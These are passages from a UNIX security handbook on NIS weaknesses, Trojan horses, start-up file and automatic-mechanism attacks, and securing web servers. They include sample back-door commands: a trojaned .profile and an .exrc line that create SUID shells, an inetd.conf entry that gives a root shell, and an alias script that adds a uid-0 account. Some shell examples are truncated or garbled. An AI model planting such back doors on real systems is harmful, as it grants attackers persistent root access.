that program instead of the real ypserv daemon. As a result, an attacker could supply his or her own version of the<br />

password file (for instance) to a login request! (The security implications of this should be obvious.)<br />

Current NIS implementations of ypbind have a -secure command line flag[12] that can be provided when the daemon is<br />

started. If the flag is used, the ypbind daemon will not accept any information from a ypserv server that is not running on a<br />

privileged port. Thus, a user-supplied attempt to masquerade as the ypserv daemon will be ignored. A user can't spoof<br />

ypserv unless that user already has superuser privileges. In practice, there is no good reason not to use the -secure flag.<br />

[12] Perhaps present as simply -s.<br />

Unfortunately, the -secure flag has a flaw. If the attacker is able to subvert the root account on a machine on the local<br />

network and start a version of ypserv using his own NIS information, he need only point the target ypbind daemon to that<br />

server. The compromised server would be running on a privileged port, so its responses would not be rejected. The ypbind<br />

process would therefore accept its information as valid, and the security could be compromised.<br />

An attacker could also write a "fake" ypserv that runs on a PC-based system. Privileged ports have no meaning in this<br />

context, so the fake server could feed any information to the target ypbind process.<br />

19.4.4.6 NIS is confused about "+"<br />

A combination of installation mistakes and changes in NIS itself has caused some confusion with respect to the NIS plus<br />

sign (+) in the /etc/passwd file.<br />

If you use NIS, be very careful that the plus sign is in the /etc/passwd file of your clients, and not your servers. On a NIS<br />

server, the plus sign can be interpreted as a username under some versions of the <strong>UNIX</strong> operating system. The simplest<br />

way to avoid this problem is to make sure that you do not have the "+" account on your NIS server.<br />

Attempting to figure out what to put on your client machine is another matter. With early versions of NIS, the following<br />

line was distributed:<br />

+::0:0::: Correct on SunOS and Solaris<br />

Unfortunately, this line presented a problem. When NIS was not running, the plus sign was sometimes taken as an account<br />

name, and anybody could log into the computer by typing + at the login: prompt. Even worse: the person logged in with<br />

superuser privileges!<br />

One way to minimize the danger was by including a password field for the plus user. Specify the plus sign line in the form:<br />

+:*:0:0::: On NIS clients only<br />


Unfortunately, this entry actually means "import the passwd map, but change all of the encrypted passwords to *," which effectively prevents everybody from logging in. This entry wasn't right either!

The easiest way to deal with this confusion is simply to attempt to log into your NIS clients and servers using a + as a username. You may also wish to try logging in with the network cable unplugged, to simulate what happens to your computer when the NIS server cannot be reached. In either case, you should not be able to log in by simply typing + as a username. If you cannot, your systems are properly configured.

If you see the following example, you have no problem:<br />

login: +<br />

password: anything<br />

Login incorrect<br />

If you see the following example, you do have a problem:<br />

login: +<br />

Last login: Sat Aug 18 16:11:32 on ttya

#<br />

NOTE: If you are running a recent version of your operating system, do not think that your system is immune<br />

to the + confusion in the NIS subsystem. In particular, some recent versions of Linux got this wrong too.<br />

19.4.5 Unintended Disclosure of Site Information with NIS<br />

Because NIS has relatively weak security, it can unintentionally disclose information about your site to attackers. In<br />

particular, NIS can disclose encrypted passwords, usernames, hostnames and their IP addresses, and mail aliases.<br />

Unless you protect your NIS server with a firewall or with a modified portmap process, anyone on the outside of your<br />

system can obtain copies of the databases exported by your NIS server. To do this, all the outsider needs to do is guess the<br />

name of your NIS domain, bind to your NIS server using the ypset command, and request the databases. This can result in<br />

the disclosure of your distributed password file, and all the other information contained in your NIS databases.<br />

There are several ways to prevent unauthorized disclosure of your NIS databases:<br />

1. The simplest is to protect your site with a firewall, or at least a smart router, and not allow the UDP packets associated with RPC to cross between your internal network and the outside world. Unfortunately, because RPC is based on the portmapper, the actual UDP port that is used is not fixed. In practice, the only safe strategy is to block all UDP packets except those that you specifically wish to let cross.

2. Another approach is to use Wietse Venema's freely available portmapper program, which allows you to specify a list of computers by hostname or IP address that should be allowed or denied access to specific RPC servers.[13] See Chapter 21, Firewalls, and Chapter 22, Wrappers and Proxies, for information on how to do this.

[13] This same functionality is built into many vendor versions, but you need to read the documentation carefully to find out how to use it. It is usually turned off by default. On Sun systems, this involves editing the /var/yp/securenets file, and on HP machines it is the /etc/inetd.sec file.

3. Some versions of NIS support the use of the /var/yp/securenets file for NIS servers. This file, when present, can be used to specify a list of networks that may receive NIS information (see the sketch after this list).

4. Don't tighten up NIS but forget about DNS! If you decide that outsiders should not be able to learn your site's IP addresses, be sure to run two nameservers, one for internal use and one for external use.
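
Where the securenets mechanism is supported, the file lists one netmask/network pair per line, and requests from addresses that match no line are refused. A minimal sketch, assuming the Sun-style /var/yp/securenets format and a hypothetical internal network of 192.168.10.0 (check your ypserv documentation for the exact syntax, and restart ypserv after editing the file):

# /var/yp/securenets - who may query this NIS server
# netmask          network
255.255.255.255    127.0.0.1
255.255.255.0      192.168.10.0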


Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

11.5 Protecting Yourself<br />

The types of programmed threats you are most likely to encounter in the UNIX environment are Trojan horses and back doors. In part, this is because writing effective worms and viruses is difficult; also, most attackers do not intend outright damage to your system. Instead, they use Trojan horses or back doors to gain (or regain) additional access to your system. If damage is a goal, obtaining superuser access is usually a first step in the process.

Some of the features that give <strong>UNIX</strong> flexibility and power also enable attackers to craft workable Trojan horse or back door schemes.<br />

In general, attacks come in one of the following forms:

● Altering the expected behavior of the shell (command interpreter)

● Abusing some form of start-up mechanism

● Subverting some form of automatic mechanism

● Exploiting unexpected interactions

All of these plans are designed basically to get a privileged user or account to execute commands that would not normally be executed. For example, one very common Trojan horse is a program named su that, instead of making you the superuser, captures the password you type and sends a copy of it to an account at another computer.

To protect your system effectively, you need to know how these attacks work. By understanding the methods of attack, you can then<br />

be aware of how to prevent them.<br />

An equally important part of protecting yourself is to run a secure system in general. Normal computer security procedures will<br />

protect your system against both programmed threats and malicious users.<br />

11.5.1 Shell Features<br />

The shells (csh, sh, ksh, tcsh, and others) provide users with a number of shortcuts and conveniences. Among these features is a<br />

complete programming language with variables. Some of these variables govern the behavior of the shell itself. If an attacker is able<br />

to subvert the way the shell of a privileged user works, the attacker can often get the user (or a background task) to execute a task for<br />

him.<br />

There are a variety of common attacks using features of the shell to compromise security. These are described in the following<br />

sections.<br />

11.5.1.1 PATH attacks<br />

Each shell maintains a path, consisting of a set of directories to be searched for commands issued by the user. This set of directories<br />

is consulted, one at a time, when the user types a command whose name does not contain a / symbol, and which does not bind to an<br />

internal shell command name or alias.<br />

In the Bourne and Korn shells, the PATH variable is normally set within the initialization file. The list of directories given normally<br />

consists of directories, separated by a colon (:). An entry of only a period, or an empty entry,[4] means to search the current directory.<br />

The csh path is initialized by setting the variable path with a list of space-separated directory names enclosed in parentheses.

[4] In a POSIX system, a null entry does not translate to the current directory; an explicit dot must be used.<br />

For instance, the following are typical initializations that have vulnerabilities:<br />


PATH=.:/usr/bin:/bin:/usr/local/bin sh or ksh<br />

set path = ( . /usr/bin /bin /usr/local/bin) csh<br />

In the above, each command sets the search path to look first in the current directory, then in /usr/bin, then in /bin, and then in<br />

/usr/local/bin. This is a poor choice of settings, especially if the user has special privileges. The current directory, as designated by a<br />

null directory or period, should never be included in the search path. To illustrate the danger of placing the current directory in your<br />

path, see the example given in "Stealing Superuser" in Chapter 4, Users, Groups, and the Superuser.<br />

You should also avoid this sort of initialization, which also places the current directory in your search path:<br />

Incorrect:

PATH=:/usr/bin:/bin:/usr/local/bin:     sh or ksh

Correct:

PATH=/usr/bin:/bin:/usr/local/bin       sh or ksh

The colons (:) should only be used as delimiters, not as end caps.

No sensitive account should ever have the current directory in its search path.[5] This rule is especially true of the superuser account!<br />

More generally, you should never have a directory in your search path that is writable by other users. Some sites keep a special<br />

directory, such as /usr/local/bin/, world-writable (mode 777) so that users can install programs for the benefit of others.<br />

Unfortunately, this practice opens up the entire system to the sort of attacks outlined earlier.<br />

[5] We would argue that no account should have the current directory in its search path, but we understand how difficult<br />

this practice would be to enforce.<br />

Putting the current directory last in the search path is also not a good idea. For instance, if you use the more command frequently, but<br />

sometimes type mroe, the attacker can take advantage of this by placing a Trojan horse named mroe in this directory. It may be many<br />

weeks or months before the command is accidentally executed. However, when the command is executed, your security will be<br />

penetrated.<br />

We strongly recommend that you get into the habit of typing the full pathname of commands when you are running as root. For<br />

example, instead of only typing chown, type /etc/chown to be sure you are getting the system version! This may seem like extra<br />

work, but when you are running as root, you also bear extra responsibility.<br />

If you create any shell files that will be run by a privileged user - including root, uucp, bin, etc. - get in the habit of resetting the<br />

PATH variable as one of the first things you do in each shell file. The PATH should include only sensible, protected directories. This<br />

method is discussed further in Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs.<br />
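
A quick way to audit an account's search path is to walk through each entry and flag anything suspicious. The following is a minimal sketch in the Bourne shell; it treats an empty entry or "." as the current directory, and only warns about world-writable directories, so review its output rather than acting on it blindly:

#!/bin/sh
# checkpath - flag risky entries in the current search path
echo "$PATH" | tr ':' '\n' |
while read dir
do
        case "$dir" in
        ""|.)   echo "WARNING: search path includes the current directory"
                continue ;;
        esac
        if [ -d "$dir" ] && ls -ld "$dir" | grep '^d.......w' > /dev/null
        then
                echo "WARNING: $dir is writable by all users"
        fi
done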

11.5.1.2 IFS attacks<br />

The IFS variable can be set to indicate what characters separate input words (similar to the -F option to awk). The benefit of this<br />

variable is that you can use it to change the behavior of the shell in interesting ways. For example, you could use the following shell<br />

script to get a list of account names and their home directories:<br />

#!/bin/sh<br />

IFS=":"<br />

while read acct passwd uid gid gcos homedir shell<br />

do<br />

echo $acct " " $homedir<br />

done < /etc/passwd<br />

(In the example shown earlier, the shell has already read and parsed the whole file before the assignment to IFS is executed, so the<br />

remaining words are not separated with colon (:) characters.)<br />

The IFS feature has largely been superseded by other tools, such as awk and Perl. However, the feature lives on and can cause<br />

unexpected damage. By setting IFS to use / as a separator, an attacker could cause a shell file or program to execute unexpected<br />

commands, as described in <strong>Sec</strong>tion 5.5.3.2, "Another SUID example: IFS and the /usr/lib/preserve hole".<br />

Most modern versions of the shell will reset their IFS value to a normal set of characters when invoked. Thus, shell files will behave<br />

properly. However, not all do. To determine if your shell is immune to this problem, try executing the following:<br />


: A test of the shell<br />

cd /tmp<br />

cat > tmp



described in this section.<br />

Example 11.1: Command Test Script<br />

: A Test of three basic commands<br />

cd /tmp<br />

if test -f ./gotcha<br />

then<br />

echo "Ooops! There is already a file named gotcha here."<br />

echo "Delete it and try again."<br />

exit 1<br />

fi<br />

cat > gotcha /dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! find gotcha!"<br />

rm -f g$$<br />

else<br />

echo "find okay"<br />

fi<br />

ls -1 * | sed 's/^/wc /' | sh >/dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! your shell gotcha!"<br />

rm -f g$$<br />

else<br />

echo "your shell okay"<br />

fi<br />

ls -1 | xargs ls >/dev/null<br />

if test -f ./g$$<br />

then<br />

echo "Ooops! xargs gotcha!"<br />

rm -f g$$<br />

else<br />

echo "xargs okay"<br />

fi<br />


rm -f ./gotcha "$fname" g$$<br />

11.5.2 Start-up File Attacks<br />

Various programs have methods of automatic initialization to set options and variables for the user. Once set, the user normally never<br />

looks at these again. As a result, they are a great spot for an attacker to make a hidden change to be executed automatically on her<br />

behalf.<br />

The problem is not that these start-up files exist, but that an attacker may be able to write to them. All start-up files should be<br />

protected so only the file's owner can write to them. Even having group-write permission on these files may be dangerous.<br />

11.5.2.1 .login, .profile, /etc/profile<br />

These files are executed when the user first logs in. Commands within the files are executed by the user's shell. Allowing an attacker<br />

to write to these files can result in arbitrary commands being executed each time the user logs in, or on a one-time basis (and hidden):<br />

: attacker's version of root's .profile file<br />

/bin/cp /bin/sh /tmp/.secret<br />

/etc/chown root /tmp/.secret<br />

/bin/chmod 4555 /tmp/.secret<br />

: run real .profile and replace this file<br />

mv /.real_profile /.profile<br />

. /.profile<br />

11.5.2.2 .cshrc, .kshrc<br />

These are files that can be executed at login or when a new shell is run. They may also be run after executing su to the user account.<br />

11.5.2.3 GNU .emacs<br />

This file is read and executed when the GNU Emacs editor is started. Commands of arbitrary nature may be written in Emacs LISP<br />

code and buried within the user's Emacs start-up commands. Furthermore, if any of the directories listed in the load-path variable are<br />

writable, the library modules can be modified with similar results.<br />

11.5.2.4 .exrc<br />

This file is read for initialization when the ex or vi editor is started. What is particularly nasty is that if there is a version of this file<br />

present in the current directory, then its contents may be read in and used in preference to the one in the user's home directory.<br />

Thus, an attacker might do the following in every directory where he has write access:<br />

% cat > .exrc<br />

!(cp /bin/sh /tmp/.secret;chmod 4755 /tmp/.secret)&<br />

^D<br />

Should the superuser ever start either the vi or ex editor in one of those directories, the superuser will unintentionally create an SUID sh. The only visible clue may be a momentary display of the ! symbol during editor start-up. The attacker can then, at a later point, recover this SUID file and take full advantage of the system.

Some versions of the vi/ex software allow you to put the command set noexrc in your EXINIT environment variable. This ability<br />

prevents any local .exrc file from being read and executed.<br />

11.5.2.5 .forward, .procmailrc<br />

Some mailers allow the user to specify special handling of mail by placing special files in their home directory. With sendmail, the<br />

user may specify certain addresses and programs in the .forward file. If an attacker can write to this file, she can specify that upon<br />

mail receipt a certain program be run - like a shell script in /tmp that creates a SUID shell for the attacker.<br />

Many popular mailer packages allow users to write filter files to process their mail in a semi-automated fashion. This includes the<br />

procmail system, MH, elm, and several others. Some of these programs are quite powerful, and have the potential to cause problems<br />

on your system. If a user writes a filter to trigger on a particular form of mail coming into the mailbox, an attacker could craft a<br />



message to cause unwarranted behavior.<br />

For example, suppose that one of your users has installed an autoreply to send an "out-of-the-office" reply to any incoming mail. If<br />

someone with malicious intent were to send a forged mail message with a bad return address, the hapless user's mailer would send an<br />

automated reply. However, the bad address would cause a bounce message to come back, only to trigger another autoreply. The<br />

result is an endless exchange of autoreplies and error messages, tying up network bandwidth (if non-local), log file space, and disk<br />

space for the user. (The solution is to use an autoreply that sends a reply to each address only once every few days, and that recognizes error messages. Unfortunately, novice users, by definition, seldom think about how what they write can go wrong.)
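
Because all of these start-up and filter files are attractive targets, it is worth checking periodically that none of them is writable by anyone but its owner. A minimal sketch using the classic find options (-perm -2 matches world-writable files, -perm -20 group-writable ones); the list of filenames is illustrative rather than exhaustive, and /home should be adjusted to wherever your users' home directories live:

find /home \( -name .forward -o -name .procmailrc -o -name .profile \
        -o -name .login -o -name .cshrc -o -name .exrc \) \
        \( -perm -20 -o -perm -2 \) -print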

11.5.2.6 Other files<br />

Other programs also have initialization files that can be abused. Third-party systems that you install on your system, such as database<br />

systems, office interfaces, and windowing systems, all may have initialization files that can cause problems if they are configured<br />

incorrectly or are writable. You should carefully examine any initialization files present on your system, and especially check their<br />

permissions.<br />

11.5.2.7 Other initializations<br />

Many programs allow you to set initialization values in environment variables in your shell rather than in your files. These can also<br />

cause difficulties if they are manipulated maliciously. For instance, in the above example for vi, the Trojan horse can be planted in<br />

the EXINIT environment variable rather than in a file. The attacker then needs to trick the superuser into somehow sourcing a file or<br />

executing a shell file that sets the environment variable and then executes the editor. Be very wary of any circumstances where you<br />

might alter one of your shell variables in this way!<br />

Another possible source of initialization errors comes into play when you edit files that have embedded edit commands. Both vi/ex<br />

and Emacs allow you to embed editor commands within text files so they are automatically executed whenever you edit the file. For<br />

this to work, they must be located in the first few or last few lines of the file.<br />

To disable this feature in Emacs, place one of these lines in your .emacs file:<br />

(setq inhibit-local-variables t)        ; Emacs version 18

or:

(setq enable-local-variables "ask")     ; Emacs version 19 and above

We know of no uniform method of disabling the undesired behavior of vi/ex on every platform without making alterations to the<br />

source. Some vendors may have provided a means of shutting off this automatic initialization, so check your documentation.<br />

11.5.3 Abusing Automatic Mechanisms<br />

<strong>UNIX</strong> has programs and systems that run automatically. Many of these systems require special privileges. If an attacker can<br />

compromise these systems, he may be able to gain direct unauthorized access to other parts of the operating system, or to plant a<br />

back door to gain access at a later time.<br />

In general, there are three principles to preventing abuse of these automatic systems:

1. Don't run anything in the background or periodically with any more privileges than absolutely necessary.

2. Don't have configuration files for these systems writable by anyone other than the superuser. Consider making them unreadable, too.

3. When adding anything new to the system that will be run automatically, keep it simple and test it as thoroughly as you can.

The first principle suggests that if you can run something in the background with a user ID other than root, you should do so. For<br />

instance, the uucp and Usenet cleanup scripts that are usually executed on a nightly basis should be run from the uucp and news<br />

UIDs, rather than as the superuser. Those shell files and their directories should all be protected so that they are unwritable by other<br />

users. In this way, an attacker can't modify the files and insert commands that will be automatically executed at a later time.<br />

11.5.3.1 crontab entries<br />

There are three forms of crontab files. The oldest form has a line with a command to be executed as superuser whenever the time<br />



field is matched by the cron daemon.[7] To execute commands from this old-style crontab file as a user other than root, it is<br />

necessary to make the command listed in the crontab file use the su command. For example:<br />

[7] All crontab files are structured with five fields (minutes, hours, days, months, day of week) indicating the time at<br />

which to run the command.<br />

59 1 * * * su news -c /usr/lib/news/news.daily<br />

This has the effect of running the su command at 1:59 a.m., resulting in a shell running as user news. The shell is given arguments of<br />

both -c and /usr/lib/news/news.daily that then cause the script to be run as a command.<br />

The second form of the cron file has an extra field that indicates on whose behalf the command is being run. Below, the script is run<br />

at 1:59 a.m. as user news without the need for a su command. This version of cron is found principally in versions of <strong>UNIX</strong> derived<br />

from the older BSD version:<br />

59 1 * * *  news  /usr/lib/news/news.daily

The third form of cron is found in System V systems, and later versions of BSD-derived <strong>UNIX</strong>. It keeps a protected directory with a<br />

separate crontab file for each user. The cron daemon examines all the files and dispatches jobs based on the user owning the file.<br />

This form of cron does not need any special care in the entries, although (like the other two versions) the files and directories need to<br />

be kept protected.<br />

A freely redistributable version of cron that has this third type of behavior is available on many FTP sites (be sure to get the latest<br />

version). It was written by Paul Vixie and is available for anyone who wants to use it for noncommercial purposes. If you are stuck<br />

with the oldest form of cron, we suggest that you consider obtaining Paul's version to replace yours.<br />
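
Whichever form you run, it is worth confirming that the crontab files and the directories that hold them are not writable by ordinary users. A minimal sketch (spool locations vary from system to system, and not all of these paths will exist on yours):

% ls -ld /usr/lib/crontab /var/spool/cron /var/spool/cron/crontabs
% ls -l  /var/spool/cron/crontabs

Only root should have write permission on any of these files or directories.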

11.5.3.2 inetd.conf<br />

The /etc/inetd.conf file defines what programs should be run when incoming network connections are caught by the inetd daemon.<br />

An intruder who can write to the file may change one of the entries in the file to start up a shell or other program to access the system<br />

upon receipt of a message. So, he might change:<br />

daytime stream tcp nowait root internal<br />

to:<br />


daytime stream tcp nowait root /bin/ksh ksh -i<br />

This would allow an attacker to telnet to the daytime port on the machine, and get a root shell any time he wanted to get back on the<br />

machine. Note that this would not result in any unusual program appearing on the system. The only way to discover this trap is to inspect the inetd.conf file itself. Obviously, this is a file to include as part of the checklist procedure for examining altered files. It is also a file that should be closely guarded.

Note that even if the command names look appropriate for each of the services listed in the inetd.conf file, if the corresponding files<br />

are writable or in a writable directory, the attacker may replace them with altered versions. They would not need to be SUID/SGID<br />

because the inetd would run them as root (if so indicated in the file).<br />
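
One simple way to catch this kind of tampering is to keep a checksum of inetd.conf on read-only or offline media and compare it regularly; a full integrity-checking tool gives more complete coverage, but even the standard sum command helps. A minimal sketch, using a hypothetical mount point /floppy for the offline copy (a cryptographic checksum such as MD5 is preferable if you have one):

# sum /etc/inetd.conf > /floppy/inetd.sum              record a baseline on offline media
# sum /etc/inetd.conf | diff - /floppy/inetd.sum       later: any output means the file has changed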

11.5.3.3 /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

This is the file of system-wide electronic mail aliases used by the sendmail program. Similar files exist for other mailers.<br />

The danger with this file is that an attacker can create a mail alias that automatically runs a particular program. For example, an<br />

attacker might add an alias that looks like this:<br />

uucheck: "|/usr/lib/uucp/local_uucheck"<br />

He might then create a SUID root file called /usr/lib/uucp/local_uucheck that essentially performs these operations:[8]<br />

[8] An actual attacker would make local_uucheck a compiled program to hide its obvious effect.<br />

#!/bin/sh<br />

echo "uucheck::0:0:fake uucp:/:/bin/sh" >> /etc/passwd<br />

The attacker now has a back door into the system. Whenever he sends mail to user uucheck, the system will put an entry into the<br />

password file that will allow the attacker to log in. He can then edit the entry out of the password file, and have free rein on the system. How often do you examine your alias file?


There are other ways of exploiting email programs that do not require the creation of SUID programs. We have omitted them from<br />

this text for safety, as an astonishingly large number of sites have world-writable alias files.<br />

Be sure that your alias file is not writable by users (if for no other reason than the fact that it gives users an easy way to intercept<br />

your mail). Make certain that no alias runs a program or writes to a file unless you are absolutely 100% certain what the program<br />

does.<br />
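
A quick way to review the alias file for risky entries is to list every alias that pipes to a program or delivers into a file. A minimal sketch (adjust the path to wherever your aliases file actually lives; the grep patterns simply flag the "|program" and "/path" forms of delivery for human review):

# grep '|' /etc/aliases            aliases that pipe mail into a program
# grep '/' /etc/aliases            aliases that deliver into files or use :include: lists
# ls -l /etc/aliases*              none of these files should be writable by ordinary users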

11.5.3.4 The at program<br />

Most <strong>UNIX</strong> systems have a program called at that allows users to specify commands to be run at a later time. This program is<br />

especially useful for jobs that only need to be run once, although it is also useful on systems that do not have a modern version of<br />

cron that allows users to set their own delayed jobs.<br />

The at command collects environment information and commands from the user and stores them in a file for later execution. The user<br />

ID to be used for the script is taken from the queued file. If an attacker can get into the queue directory to modify the file owner or<br />

contents, it is possible that the files can be subverted to do something other than what was intended. Thus, for obvious reasons, the<br />

directory where at stores its files should not be writable by others, and the files it creates should not be writable (or readable) by<br />

others.<br />

Try running at on your system. If the resulting queue files (usually in /usr/spool/atrun, /usr/spool/at, or /var/spool/atrun) can be<br />

modified by another user, you should fix the situation or consider disabling the atrun daemon (usually dispatched by cron every 15<br />

minutes).<br />
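
The check itself is straightforward. A minimal sketch (only some of these spool directories will exist on a given system; Solaris, for example, uses /var/spool/cron/atjobs):

% ls -ld /usr/spool/at /usr/spool/atrun /var/spool/atrun /var/spool/cron/atjobs
% ls -l  /usr/spool/at

Only root (or the daemon's own user) should have write access to whichever directory exists, and the queue files inside should not be readable or writable by other users.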

11.5.3.5 System initialization files<br />

The system initialization files are another ideal place for an attacker to place commands that will allow access to the system. By<br />

putting selected commands in the /etc/rc*, /etc/init.d/*, /etc/rc?.d, and other standard files, an attacker could reconstruct a back door<br />

into the system whenever the system is rebooted or the run-level is changed. All the files in /etc should be kept unwritable by other<br />

users!<br />

Be especially careful regarding the log files created by programs automatically run during system initialization. These files can be<br />

used to overwrite system files through the use of symlinks.<br />
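
A periodic sweep for writable files under /etc catches most mistakes of this kind. A minimal sketch using the classic find options (-perm -2 matches world-writable entries, -perm -20 group-writable ones); expect a few legitimate exceptions on some systems, so review the output rather than acting on it blindly:

# find /etc \( -perm -2 -o -perm -20 \) \( -type f -o -type d \) -print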

11.5.3.6 Other files<br />

Other files may be run on a regular basis, and these should be protected in a similar manner. The programs and data files should be<br />

made nonwritable (and perhaps nonreadable) by unprivileged users. All the directories containing these files and commands up to<br />

and including the root directory should be made nonwritable.<br />

As an added precaution, none of these files or directories (or the ones mentioned earlier) should be exported via NFS (described in<br />

Chapter 20, NFS). If you must export the files via NFS, export them read-only, and/or set their ownership to root.<br />

Note that this presents a possible contradiction: giving root ownership to files that don't need to be owned by root to run. For instance, if you export

the UUCP library via NFS, you would need to set the files and directory to be owned by root to prevent their modification by an<br />

attacker who has subverted one of your NFS hosts. At the same time, that means that the shell files may be forced to run as root<br />

instead of as uucp - otherwise, they won't be able to modify some of the files they need to alter!<br />

In circumstances such as these, you should export the directories read-only and leave the files owned by uucp. If there is any reason<br />

at all to have writable files or subdirectories in what you export,[9] use symbolic links to keep a separate copy on each system. For<br />

instance, you could replace a file in the exported directory via a link to /local/uucp or /var/uucp and create a local version on each<br />

machine.<br />

[9] No obvious example comes to mind. We recommend against thinking of any!<br />

Other files and directories to protect include:

● The NIS/NIS+ database and commands (often in /usr/etc/yp or /var/nis)

● The files in /usr/adm, /var/adm, and/or /var/log used for accounting and logging

● The files in your mailer queue and delivery area (usually /usr/spool/mqueue and /usr/spool/mail or linked to those names)

● All the files in the libraries (/lib, /usr/lib, and /usr/local/lib)


No files that are used as part of your system's start-up procedure or for other automatic operations should be exported via NFS. If<br />

these files must be exported using NFS, they should be set on the server to be owned by root and placed in a directory that is owned<br />

by root. Do not export files or directories for UUCP or other subsystems that require ownership by users other than root.<br />


Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.2 Running a <strong>Sec</strong>ure Server<br />

Web servers are designed to receive anonymous requests from unauthenticated hosts on the <strong>Internet</strong> and to<br />

deliver the requested information in a quick and efficient manner. As such, they provide a portal into your<br />

computer that can be used by friend and foe alike.<br />

No piece of software is without its risk. Web servers, by their nature, are complicated programs. Furthermore,<br />

many organizations use Web servers with source code that is freely available over the <strong>Internet</strong>. Although this<br />

means that the source code is available for inspection by the organization, it also means that an attacker can<br />

scan that same source code and look for vulnerabilities.<br />

The ability to add functions to a Web server through the use of CGI scripts tremendously complicates their<br />

security. While a CGI script can add new features to a Web server, it can also introduce security problems of<br />

its own. For example, a Web server may be configured so that it can only access files stored in a particular<br />

directory on your computer, but a user may innocently install a CGI script that allows outsiders to read any file<br />

on your computer. Furthermore, because many users do not have experience in writing secure programs, it is<br />

possible (and likely) that locally written CGI scripts will contain bugs allowing an outsider to execute arbitrary<br />

commands on your system. Indeed, several books that have been published on CGI programming have<br />

included such flaws.<br />

Because of the richness of its tools, the plethora of programming languages, and the ability of multiple users to<br />

be logged in at the same time from remote sites over a network, the <strong>UNIX</strong> operating system is a remarkably<br />

bad choice for running secure Web servers. Because many PC-based operating systems share many of these<br />

characteristics, they are also not very good choices. Experience has shown that the most secure Web server is a<br />

computer that runs a Web server and no other applications, that does not have a readily accessible scripting<br />

language, and that does not support remote logins. In practice, this describes an Apple Macintosh computer<br />

running MacHTTP, WebStar, or a similar Web server. According to recent surveys, such computers comprise<br />

as many as 15% of the Web servers on the <strong>Internet</strong>.<br />

Of course, there are many advantages to running a Web server on a <strong>UNIX</strong> computer instead of a Macintosh.<br />

<strong>UNIX</strong> generally runs faster than MacOS on comparable hardware, and <strong>UNIX</strong> is available for hardware<br />

platforms that run faster than PowerPC-based computers. Furthermore, it is generally easier for organizations<br />

to integrate <strong>UNIX</strong>-based Web servers with their existing information infrastructure, creating interesting<br />

possibilities for Web offerings. Finally, more MIS professionals have familiarity with building <strong>UNIX</strong>-based<br />

<strong>Internet</strong> servers than with building MacOS-based ones. Nonetheless, we suggest that the security-conscious<br />

administrator give the Mac-based approach serious thought.<br />

To build a secure Web server on any platform, you must be able to assure a variety of things, including:

● Network users must never be able to execute arbitrary programs or shell commands on your server.

● CGI scripts that run on your server must perform either the expected function or return an error message. Scripts should expect and be able to handle any maliciously tailored input.

● In the event that your server is compromised, an attacker should not be able to use it for further attacks against your organization.

The following sections explore a variety of techniques for dealing with these issues.<br />

18.2.1 The Server's UID<br />

Most Web servers are designed to be started by the superuser. The server needs to be run as root so it can listen for requests on port 80, the standard HTTP port (on UNIX, only the superuser can bind to ports below 1024).

Once the server starts running, it changes its UID to the username that is specified in a configuration file. In<br />

the case of the NCSA server, this configuration file is called conf/httpd.conf. In the file, there are three lines<br />

that read:<br />

# User/Group: The name (or #number) of the user/group to run httpd as.<br />

User http<br />

Group http<br />

This username should not be root. Instead, the user and group should specify a user that has no special access<br />

on your server.<br />

In the example above, the server changes its UID to the http user before accessing files or running CGI scripts. If you have a CGI script that is to be run as superuser (and you should think very carefully about doing so), it must be SUID root. Before you write such a script, carefully read Chapter 23.

NOTE: Do not run your server as root! Although your server must be started by root, the httpd.conf file must not contain the line "User root". If it does, then every script that your Web server executes will be run as superuser, creating many potential problems.
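
You can confirm that the configuration took effect by looking at the running processes. A minimal sketch (the ps options and output format differ between System V- and BSD-derived systems):

# ps -ef | grep httpd          System V style; use "ps aux | grep httpd" on BSD-derived systems

The parent process, the one listening on port 80, appears with owner root; every child that actually services requests should appear with the owner named in the User directive, and none of them should be root.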

18.2.2 Understand Your Server's Directory Structure<br />

Web servers are complicated pieces of software. They use many files in many directories. The contents of<br />

some directories are made available over the network. The contents of other directories must not be made<br />

available over the network, and, for safety, should not be readable by users on your system. To run a secure<br />

server, you must understand the purpose of each directory, and the necessary protections that it must have.<br />

The NCSA server has six directories:

Directory  Purpose

cgi-bin    Holds CGI scripts
conf       Holds server configuration files
htdocs     Holds Web documents
icons      Holds the icons used in directory listings
logs       Records server activity
support    Holds supplemental programs for the server

Many sources recommend creating a user called www and a group called www, which can be used by the Web administrator to administer the Web server:

drwxr-xr-x 5 www www 1024 Aug 8 00:01 cgi-bin/<br />

drwxr-x--- 2 www www 1024 Jun 11 17:21 conf/<br />

-rwx------ 1 www www 109674 May 8 23:58 httpd<br />

drwxrwxr-x 2 www www 1024 Aug 8 00:01 htdocs/<br />

drwxrwxr-x 2 www www 1024 Jun 3 21:15 icons/<br />

drwxr-x--- 2 www www 1024 May 4 22:23 logs/<br />

This is an interesting approach, but we don't think that it adds much in the way of security. Because the httpd<br />

program is run as root, anybody who has the ability to modify this program has the ability to become the<br />

superuser. This is a particular vulnerability if you should ever move the server or configuration files onto an<br />

NFS-exported partition. Therefore, we recommend acknowledging this fact, and setting up your Web server<br />

directory with root ownership:<br />

drwx--x--x 8 root www 1024 Nov 23 09:25 cgi-bin/<br />

drwx------ 2 root www 1024 Nov 26 11:00 conf/<br />

drwxr-xr-x 2 root www 1024 Dec 7 18:22 htdocs/<br />

-rwx------ 1 root www 482168 Aug 6 00:29 httpd*<br />

drwxrwxr-x 2 root www 1024 Dec 1 18:15 icons/<br />

drwx------ 2 root www 1024 Nov 25 16:18 logs/<br />

drwxr-xr-x 2 root www 1024 Aug 6 00:31 support/<br />

Notice that the cgi-bin directory has access mode 711; this allows the httpd server to run programs that it<br />

contains, but it doesn't allow a person on the server to view the contents of the directory. More restrictions<br />

make probing for vulnerabilities more difficult.<br />
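One way to establish the ownership and modes shown above from the shell, assuming the server root is /usr/local/etc/httpd (adjust the path to match your installation):

# cd /usr/local/etc/httpd
# chown -R root:www .
# chmod 711 cgi-bin
# chmod 700 conf logs httpd
# chmod 755 htdocs support
# chmod 775 icons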

18.2.2.1 Configuration files<br />

Inside the conf directory, the NCSA server has the following files:<br />

File         Purpose

access.conf  Controls access to the server's files.
httpd.conf   Configuration file for the server.
mime.types   Determines the mapping of file extensions to MIME file types.
